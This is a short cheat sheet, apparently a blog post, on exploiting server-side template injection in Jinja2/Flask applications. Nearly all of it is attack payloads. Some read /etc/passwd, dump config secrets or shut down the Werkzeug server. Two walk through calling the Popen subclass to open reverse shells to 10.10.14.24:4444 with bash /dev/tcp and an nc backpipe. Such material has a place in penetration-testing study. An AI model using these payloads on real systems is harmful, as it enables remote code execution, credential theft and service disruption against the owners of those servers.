Check with {{ 7+3 }} if this is executed, if a Python interpreter is using the template jinja engine.
{{ 7+3 }}
{{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}
{{ request.environ[‘werkzeug.server.shutdown’]() }} // ...
{{ config.items() }} // Read all config variables
{{ config|pprint }}
Example:
- Execute the following to get an array of available classes.
{{ ''.__class__.__mro__[1].__subclasses__() }}This returns something like this.
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, ...
- Look if this includes Popen. If yes, note the index.
In this case, we have popen at index 407 (line 408 — 1). - {{”.__class__.__mro__[1].__subclasses__()[407](“bash ‑i >& /dev/tcp/10.10.14.24/4444 0>&1”,shell=True,stdout=-1, stderr=-1).communicate()}}
- {{”.__class__.__mro__[1].__subclasses__()[407](“mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 10.10.14.24 4444 1>/tmp/backpipe”,shell=True,stdout=-1, stderr=-1).communicate()}}
- https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870
Leave a Reply
You must be logged in to post a comment.